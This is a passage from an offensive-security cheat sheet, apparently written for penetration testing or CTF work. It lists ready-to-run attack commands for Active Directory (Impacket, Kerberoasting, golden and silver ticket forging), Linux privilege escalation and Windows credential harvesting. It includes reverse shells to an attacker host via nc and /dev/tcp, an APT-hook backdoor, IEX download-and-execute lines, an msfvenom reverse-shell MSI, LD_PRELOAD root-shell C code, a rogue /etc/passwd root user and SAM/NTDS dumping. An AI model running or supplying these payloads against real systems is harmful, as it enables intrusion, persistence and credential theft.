-username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -target '<FQDN>' -template '<TEMPLATE>' -upn '<USERNAME>@<DOMAIN>' -dns '<FQDN>' -debug ``` ##### Revert Changes ```shell certipy-ad template -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -template '<TEMPLATE>' -configuration <TEMPLATE>.json ``` ##### Start BloodHound Fork ```shell ./BloodHound --disable-gpu-sandbox ``` #### enum4linux-ng ```shell enum4linux-ng -A <RHOST> ``` #### Evil-WinRM ```shell evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD> evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S ``` #### Impacket ##### impacket-atexec ```shell impacket-atexec -k -no-pass <DOMAIN>/Administrator@<RHOST> 'type C:\PATH\TO\FILE\<FILE>' ``` ##### impacket-changepasswd ```console impacket-changepasswd <DOMAIN>/<USERNAME>@<RHOST> -reset -altuser <USERNAME> -althash :<HASH> ``` ##### impacket-dcomexec ```shell impacket-dcomexec <RHOST> -object MMC20 -silentcommand -debug <DOMAIN>/<USERNAME>:<PASSWORD> <COMMAND> impacket-dcomexec -dc-ip <RHOST> -object MMC20 -slientcommand <DOMAIN>/<USERNAME>@<RHOST> <COMMAND> ``` ##### impacket-findDelegation ```shell impacket-findDelegation <DOMAIN>/<USERNAME> -hashes :<HASH> ``` ##### impacket-GetADUsers ```shell impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/ ``` ##### impacket-GetNPUsers ```shell impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST> ``` ##### impacket-getST ```shell impacket-getST <DOMAIN>/<USERNAME> -spn <USERNAME>/<RHOST> -hashes :<HASH> -impersonate <USERNAME> impacket-getST <DOMAIN>/<USERNAME>$ -spn <USERNAME>/<RHOST> -hashes :<HASH> -impersonate <USERNAME> ``` ##### impacket-getTGT ```shell impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD> impacket-getTGT <DOMAIN>/<USERNAME> -dc-ip <DOMAIN> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c ``` ##### impacket-getUserSPNs ```shell impacket-GetUserSPNs <DOMAIN>/<USERNAME> -dc-ip <RHOST> -request impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -dc-ip <RHOST> -request ``` ```shell export KRB5CCNAME=<USERNAME>.ccache impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request ``` ##### impacket-lookupsid ```shell impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> ``` ##### impacket-netview ```shell impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt ``` ##### impacket-ntlmrelayx ###### Common Commands ```shell impacket-ntlmrelayx -t ldap://<RHOST> -smb2support --interactive impacket-ntlmrelayx -t ldap://<RHOST> -smb2support --delegate-access --no-dump --add-dns-record 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' '<LHOST>' impacket-ntlmrelayx -t ldap://<RHOST> --no-wcf-server --escalate-user <USERNAME> impacket-ntlmrelayx -t <LHOST> --no-http-server -smb2support -c "powershell -enc JAB<--- SNIP --->j==" ``` ###### Example ```shell impacket-ntlmrelayx --no-http-server -smb2support -t <RHOST> -c "powershell -enc JAB<--- SNIP --->j==" ``` ```cmd dir \\<LHOST>\foobar ``` ```shell nc -lnvp <LPORT> ``` ##### impacket-psexec ```shell impacket-psexec <USERNAME>@<RHOST> impacket-psexec <DOMAIN>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18 ``` ##### impacket-req ```shell impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <COMMAND> <COMMAND> ``` ##### impacket-rpcdump ```shell impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> ``` ##### impacket-samrdump ```shell impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> ``` ##### impacket-secretsdump ```shell impacket-secretsdump <DOMAIN>/<USERNAME>@<RHOST> impacket-secretsdump -dc-ip <RHOST> <DOMAIN>/<SUERNAME>:<PASSWORD>@<RHOST> impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash ``` ```shell export KRB5CCNAME=<USERNAME>.ccache impacket-secretsdump -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass -debug ``` ##### impacket-services ```shell impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <COMMAND> ``` ##### impacket-smbclient ```shell impacket-smbclient <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> ``` ```shell export KRB5CCNAME=<USERNAME>.ccache impacket-smbclient -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass ``` ##### impacket-smbpasswd ```shell impacket-smbpasswd <RHOST>/<USERNAME>:<PASSWORD>@<RHOST> -newpass <PASSWORD> ``` ##### impacket-smbserver ```shell impacket-smbserver share . -smb2support impacket-smbserver -smb2support share <FOLDER> -user <USERNAME> -password <PASSWORD> ``` ##### impacket-ticketer ###### Requirements * Valid User * NTHASH * Domain-SID ```shell export KRB5CCNAME=<USERNAME>.ccache impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <DOMAIN> -spn MSSQLSVC/<RHOST>.<DOMAIN> -user-id 500 Administrator ``` ###### Fixing [-] exceptions must derive from BaseException ###### Issue ```shell impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST> -no-pass -request Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] exceptions must derive from BaseException ``` ###### To fix it ```shell 241 if self.__doKerberos: 242 #target = self.getMachineName() 243 target = self.__kdcHost ``` ##### dacledit.py > https://github.com/fortra/impacket/blob/204c5b6b73f4d44bce0243a8f345f00e308c9c20/examples/dacledit.py ```shell python3 dacledit.py -action 'read' -principal '<USERNAME>' -target '<GROUP>' -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' '<DOMAIN>/<USERNAME>' -k -dc-ip <RHOST> -debug python3 dacledit.py -action 'read' -principal '<USERNAME>' -target '<GROUP>' -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' '<DOMAIN>/<USERNAME>:<PASSWORD>' -k -dc-ip <RHOST> -debug python3 dacledit.py -action 'write' -rights 'FullControl' -principal '<USERNAME>' -target-dn 'CN=<GROUP{>,CN=<GROUP>,DC=<DOMAIN>,DC=<DOMAIN>' '<DOMAIN>/<USERNAME>:<PASSWORD>' python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal '<USERNAME>' -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' '<DOMAIN>/<USERNAME>' -k -no-pass -dc-ip <RHOST> python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal '<USERNAME>' -target-dn 'OU=<GROUP>,DC=<DOMAIN>,DC=<DOMAIN>' '<DOMAIN>/<USERNAME>' -k -use-ldaps -dc-ip <RHOST> ``` ###### Fixing msada_guids Error ```shell #from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS ``` Then put the `msada_guids.py` into the same directory as `dacledit.py` > https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py ##### owneredit.py > https://github.com/fortra/impacket/blob/5c477e71a60e3cc434ebc0fcc374d6d108f58f41/examples/owneredit.py ```shell python3 owneredit.py -k <DOMAIN>/<USERNAME>:<PASSWORD> -dc-ip <RHOST> -action write -new-owner <USERNAME> -target <GROUP> -debug ``` ##### ThePorgs Fork ```shell pipenv shell git clone https://github.com/ThePorgs/impacket/ pip3 install -r requirements.txt sudo python3 setup.py install ``` #### JAWS ```cmd IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1') ``` #### Kerberos > https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a ##### General Notes - Golden Ticket is a Ticket Granting Ticket (TGT) and completely forged offline (KRBTGT Account Hash needed). - Silver Ticket is a forged service authentication ticket (Service Principal Name (SPN) and Machine Account Keys (Hash in RC4 or AES) needed). Silver Tickets do not touch the Domain Controller (DC). - Diamond Ticket is essentially a Golden Ticket but requested from a Domain Controller (DC). ##### Bruteforce ```shell ./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE> ``` ###### With List of Users ```cmd .\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE> ``` ###### Check Passwords for all Users in Domain ```cmd .\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE> ``` ##### ASPREPRoast ###### Check ASPREPRoast for all Domain Users (Credentials required) ```shell impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE> impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE> ``` ###### Check ASPREPRoast for a List of Users (No Credentials required) ```shell impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE> impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE> ``` ###### Check ASPREPRoast for all Domain Users in Domain ```cmd .\Rubeus.exe asreproast /format:hashcat /outfile:<FILE> ``` ##### Kerberoasting ```cmd impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE> .\Rubeus.exe kerberoast /outfile:<FILE> iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE> Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE> ``` ##### Overpass The Hash/Pass The Key (PTK) ###### Request TGT with Hash ```shell impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH> ``` ###### Request TGT with aesKey (More secure Encryption, probably more stealth due is it used by Default) ```shell impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY> ``` ###### Request TGT with Password ```shell impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD> ``` ###### Set TGT for Impacket Usage ```shell export KRB5CCNAME=<USERNAME>.ccache ``` ###### Execute Remote Commands ```shell impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass ``` ###### Ask and inject the Ticket ```cmd .\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt ``` ###### Execute a CMD on Remote Host ```cmd .\PsExec.exe -accepteula \\<RHOST> cmd ``` ##### Pass The Ticket (PTT) ###### Harvest Tickets from Linux ###### Check Type and Location of Tickets ```shell grep default_ccache_name /etc/krb5.conf ``` * If none return, default is FILE:/tmp/krb5cc_%{uid} * In Case of File Tickets it is possible to Copy-Paste them to use them * In Case of being KEYRING Tickets, the Tool tickey can be used to get them * To dump User Tickets, if root, it is recommended to dump them all by injecting in other user processes * To inject, the Ticket have to be copied in a reachable Folder by all Users ```shell cp tickey /tmp/tickey /tmp/tickey -i ``` ###### Harvest Tickets from Windows ```cmd sekurlsa::tickets /export .\Rubeus dump ``` ###### Convert Tickets dumped with Rubeus into base64 ```cmd [IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>")) ``` ###### Convert Tickets between Linux and Windows Format with ticket_converter.py > https://github.com/Zer1t0/ticket_converter ```shell python ticket_converter.py ticket.kirbi ticket.ccache python ticket_converter.py ticket.ccache ticket.kirbi ``` ###### Using Ticket on Linux ```shell export KRB5CCNAME=<USERNAME>.ccache ``` ###### Execute Remote Commands by using TGT ```shell impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass ``` ###### Using Ticket on Windows ###### Inject Ticket with mimikatz ```cmd kerberos::ptt <KIRBI_FILE> ``` ###### Inject Ticket with Rubeus ```cmd .\Rubeus.exe ptt /ticket:<KIRBI_FILE> ``` ###### Execute a CMD on Remote Host ```cmd .\PsExec.exe -accepteula \\<RHOST> cmd ``` ##### Silver Ticket ###### Impacket Examples ###### Generate TGS with NTLM ```shell python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USERNAME> ``` ###### Generate TGS with aesKey ```shell python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USERNAME> ``` ###### Set the ticket for impacket use ```shell export KRB5CCNAME=<USERNAME>.ccache ``` ###### Execute Remote Commands by using TGT ```shell impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass ``` ##### mimikatz Examples ###### Generate TGS with NTLM ```cmd kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST> ``` ###### Generate TGS with AES 128bit Key ```cmd kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST> ``` ###### Generate TGS with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default) ```cmd kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST> ``` ###### Inject TGS with Mimikatz ```cmd kerberos::ptt <KIRBI_FILE> ``` ##### Rubeus Examples ```cmd .\Rubeus.exe ptt /ticket:<KIRBI_FILE> ``` ###### Execute CMD on Remote Host ```cmd .\PsExec.exe -accepteula \\<RHOST> cmd ``` ##### Golden Ticket ###### Impacket Examples ###### Generate TGT with NTLM ```shell python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN> <USERNAME> ``` ###### Generate TGT with aesKey ```shell python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> <USERNAME> ``` ###### Set TGT for Impacket Usage ```shell export KRB5CCNAME=<USERNAME>.ccache ``` ###### Execute Remote Commands by using TGT ```shell impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass ``` ##### mimikatz Examples ###### Generate TGT with NTLM ```cmd kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME> ``` ###### Generate TGT with AES 128bit Key ```cmd kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> ``` ###### Generate TGT with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default) ```cmd kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> ``` ###### Inject TGT with Mimikatz ```cmd kerberos::ptt <KIRBI_FILE> ``` ##### Rubeus Examples ###### Inject Ticket with Rubeus ```cmd .\Rubeus.exe ptt /ticket:<KIRBI_FILE> ``` ###### Execute CMD on Remote Host ```cmd .\PsExec.exe -accepteula \\<RHOST> cmd ``` ###### Get NTLM from Password ```shell python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest())' ``` #### ldapsearch ```shell ldapsearch -x -h <RHOST> -s base namingcontexts ldapsearch -H ldap://<RHOST> -x -s base -b '' "(objectClass=*)" "*" + ldapsearch -H ldaps://<RHOST>:636/ -x -s base -b '' "(objectClass=*)" "*" + ldapsearch -x -H ldap://<RHOST> -D '' -w '' -b "DC=<RHOST>,DC=local" ldapsearch -x -H ldap://<RHOST> -D '' -w '' -b "DC=<RHOST>,DC=local" | grep descr -A 3 -B 3 ldapsearch -x -h <RHOST> -b "dc=<RHOST>,dc=local" "*" | awk '/dn: / {print $2}' ldapsearch -x -h <RHOST> -D "<USERNAME>" -b "DC=<DOMAIN>,DC=<DOMAIN>" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ldapsearch -H ldap://<RHOST> -D <USERNAME> -w "<PASSWORD>" -b "CN=Users,DC=<RHOST>,DC=local" | grep info ``` #### Linux ##### Basic Linux Enumeration ```shell id sudo -l env cat ~/.bashrc cat /etc/passwd cat /etc/hosts cat /etc/fstab lsblk ls -lah /etc/cron* crontab -l sudo crontab -l grep "CRON" /var/log/syslog ss -tulpn ps -auxf ls -lahv ls -R /home ls -la /opt dpkg -l uname -a ``` ##### Abusing Password Authentication ```shell openssl passwd <PASSWORD> echo "root2:FgKl.eqJO6s2g:0:0:root:/root:/bin/bash" >> /etc/passwd su root2 ``` ##### Apache2 ###### Read first Line of a File with apache2 Binary ```shell sudo /usr/sbin/apache2 -f <FILE> ``` ##### APT ```shell echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"};' > /etc/apt/apt.conf.d/<FILE> ``` ##### arua2c ```shell aria2c -d /root/.ssh/ -o authorized_keys "http://<LHOST>/authorized_keys" --allow-overwrite=true ``` ##### Bash Debugging Mode - Bash <4.4 ```shell env -i SHELLOPTS=xtrace PS4='$(chmod +s /bin/bash)' /usr/local/bin/<BINARY> ``` ##### Bash Functions - Bash <4.2-048 ```shell function /usr/sbin/<BINARY> { /bin/bash -p; } export -f /usr/sbin/<BINARY> /usr/sbin/<BINARY> ``` ##### Capabilities ```shell capsh --print /usr/sbin/getcap -r / 2>/dev/null ``` ##### Credential Harvesting ```shell grep -R db_passwd grep -roiE "password.{20}" grep -oiE "password.{20}" /etc/*.conf grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$" // grep for passwords like "DBPassword:" watch -n 1 "ps -aux | grep pass" sudo tcpdump -i lo -A | grep "pass" ``` ##### find Commands ```shell find / -user <USERNAME> -ls 2>/dev/null find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null find / -group <GROUP> 2>/dev/null find / -perm -4000 2>/dev/null | xargs ls -la find / -type f -user root -perm -4000 2>/dev/null find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null find / -writable -type d 2>/dev/null find / -cmin -60 // find files changed within the last 60 minutes find / -amin -60 // find files accesses within the last 60 minutes find ./ -type f -exec grep --color=always -i -I 'password' {} \; // search for passwords ``` ##### iptables ###### sudo Misconfiguration Abuse ```shell sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n<SSH_KEY>\n' sudo iptables -S sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys ``` ##### Kernel Exploits ```shell searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8" ``` ##### LD_PRELOAD > https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ ###### shell.c ```c #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); } ``` or ```c #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/sh"); } ``` ###### Compiling ```shell gcc -o <SHARED_OBJECT>.so <FILE>.c -shared -FPIC -nostartfiles ``` ###### Privilege Escalation ```shell sudo LD_PRELOAD=/PATH/TO/SHARED_OBJECT/<SHARED_OBJECT>.so <BINARY> ``` ##### LD_LIBRARY_PATH ###### Get Information about Libraries ```shell ldd /PATH/TO/BINARY/<BINARY> ``` ###### shell.c ```c #include <stdio.h> #include <stdlib.h> static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ``` ###### Compiling ```shell gcc -o <LIBRARY>.so.<NUMBER> -shared -fPIC <FILE>.c ``` ###### Privilege Escalation ```shell sudo LD_LIBRARY_PATH=/PATH/TO/LIBRARY/<LIBRARY>.so.<NUMBER> <BINARY> ``` ##### logrotten > https://github.com/whotwagner/logrotten ```shell if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi ``` ###### If "create"-option is set in logrotate.cfg ```shell ./logrotten -p ./payloadfile /tmp/log/pwnme.log ``` ###### If "compress"-option is set in logrotate.cfg ```shell ./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log ``` ##### Path Variable Hijacking ```shell find / -perm -u=s -type f 2>/dev/null find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u export PATH=$(pwd):$PATH ``` ##### PHP7.2 ```shell /usr/bin/php7.2 -r "pcntl_exec('/bin/bash', ['-p']);" ``` #### rbash ##### Breakout using $PATH Variable ```shell export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` ##### Breakouts using less ```shell less /etc/profile !/bin/sh ``` ```shell VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile v ``` ```shell less /etc/profile v:shell ``` ##### Breakout using scp ```shell TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" scp -S $TF x y: ``` ##### Breakouts using vi ```shell vi -c ':!/bin/sh' /dev/null ``` ```shell vi :set shell=/bin/sh :shell ``` ##### Breakouts using SSH Command Execution ```shell ssh <USERNAME>@<RHOST> -t sh ssh <USERNAME>@<RHOST> -t /bin/sh ssh <USERNAME>@<RHOST> -t "/bin/bash --no-profile" ``` ##### relayd The binary need to have the `SUID` bit set. ```shell /usr/sbin/relayd -C /etc/shadow ``` ##### Shared Library Misconfiguration > https://tbhaxor.com/exploiting-shared-library-misconfigurations/ ###### shell.c ```c #include <stdlib.h> #include <unistd.h> void _init() { setuid(0); setgid(0); system("/bin/bash -i"); } ``` ###### Compiling ```shell gcc -shared -fPIC -nostartfiles -o <FILE>.so <FILE>.c ``` ##### Wildcards > https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt With the command `touch -- --checkpoint=1` will be a file created. Why? Because the `--` behind the command `touch` is telling touch, that there's option to be wait for. Instead of an option, it creates a file, named `--checkpoint=1`. ```shell touch -- --checkpoint=1 ``` or ```shell touch ./--checkpoint=1 ``` So after creating the `--checkpoint=1` file, i created another file, which executes a shell script. ```shell touch -- '--checkpoint-action=exec=sh shell.sh' ``` or ```shell touch ./--checkpoint-action=exec=<FILE> ``` To delete a misconfigured file, put a `./` in front of it. ```shell rm ./'--checkpoint-action=exec=python script.sh' ``` ##### Writeable Directories in Linux ```shell /dev/shm /tmp ``` #### Microsoft Windows ##### Basic Microsoft Windows Enumeration ```cmd whoami /all whoami /user systeminfo net accounts net user net user /domain net user <USERNAME> Get-LocalUser Get-LocalGroup Get LocalGroupMember <GROUP> Get-Process tree /f C:\Users\ tasklist /SVC sc query sc qc <SERVICE> netsh firewall show state schtasks /query /fo LIST /v wmic qfe get Caption,Description,HotFixID,InstalledOn driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path ``` ##### Access Control ###### S-R-X-Y Example | Value | Info | | --- | --- | | S | SID | | R | Revision (always set to 1) | | X | Identifier Authority (5 is the most common one) | | Y | Sub Authority | ###### SID Table | SID | Value | | --- | --- | | S-1-0-0 | Nobody | | S-1-1-0 | Everybody | | S-1-5-11 | Authenticated Users | | S-1-5-18 | Local System | | S-1-5-domainidentifier-500 | Administrator | ##### accesschk ###### Checking File Permissions ```cmd .\accesschk.exe /accepteula -quvw "C:\PATH\TO\FILE\<FILE>.exe" ``` ###### Checking Service Permissions ```cmd .\accesschk.exe /accepteula -uwcqv <USERNAME> daclsvc ``` ###### Checking Path Permissions to find Unquoted Service Paths ```cmd .\accesschk.exe /accepteula -uwdq C:\ .\accesschk.exe /accepteula -uwdq "C:\Program Files\" .\accesschk.exe /accepteula -uwdq "C:\Program Files\<UNQUOTED_SERVICE_PATH>" ``` ###### Checking Registry Entries ```cmd .\accesschk.exe /accepteula -uvwqk <REGISTRY_KEY> ``` ##### Show hidden Files and Folders ```cmd dir /a // show hidden folders dir /a:d // show all hidden directories dir /a:h // show all hidden files cmd /c dir /A // show hidden folders cmd /c dir /A:D // show all hidden directories cmd /c dir /A:H // show all hidden files powershell ls -force // show all hidden files ``` ##### Show installed Applications ```cmd Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ``` ##### User Handling ###### Adding Users to Groups ```cmd net user <USERNAME> <PASSWORD> /add /domain net group "Exchange Windows Permissions" /add <USERNAME> net localgroup "Remote Management Users" /add <USERNAME> ``` ##### Credential Harvesting ###### Quick Wins > https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ&s=09 > https://www.nirsoft.net/utils/credentials_file_view.html ```cmd cmdkey /list rundll32 keymgr.dll, KRShowKeyMgr reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString ``` ###### Search for Passwords ```cmd findstr /si password *.xml *.ini *.txt dir .s *pass* == *.config dir /s *pass* == *cred* == *vnc* == *.config* Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.vbs -File -Recurse -ErrorAction SilentlyContinue ``` ###### PowerShell History ```cmd Get-History (Get-PSReadlineOption).HistorySavePath type C:\Users\%username%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` ###### Saved Windows Credentials ```cmd cmdkey /list runas /savecred /user:<USERNAME> cmd.exe ``` ###### Winlogon Credentials ```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ``` ###### Local Administrator Password Solution (LAPS) ```cmd Get-ADComputer <RHOST> -property 'ms-mcs-admpwd' ``` ###### Search the Registry for Passwords ```cmd reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ###### Dumping Credentials ```cmd reg save hklm\system system reg save hklm\sam sam reg.exe save hklm\sam c:\temp\sam.save reg.exe save hklm\security c:\temp\security.save reg.exe save hklm\system c:\temp\system.save ``` ###### Find KeePass Databases ```cmd Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue ``` ###### Internet Information Service (IIS) ```cmd C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:* type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString ``` ###### PuTTY ```cmd reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s ``` ###### Unattended Windows Installations ```shell C:\Unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` ##### Enable WinRM ```cmd winrm quickconfig ``` ##### Enable Remote Desktop (RDP) ```cmd reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=yes ``` or ```cmd Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0; Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"; ``` ##### Privileges and Permissions ###### AlwaysInstallElevated ```cmd reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer ``` ```shell msfvenom -p windows/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> -f msi > <FILE>.msi ``` ```cmd msiexec /quiet /qn /i <FILE>.msi ``` ###### SeBackup and SeRestore Privilege ###### Backup SAM and 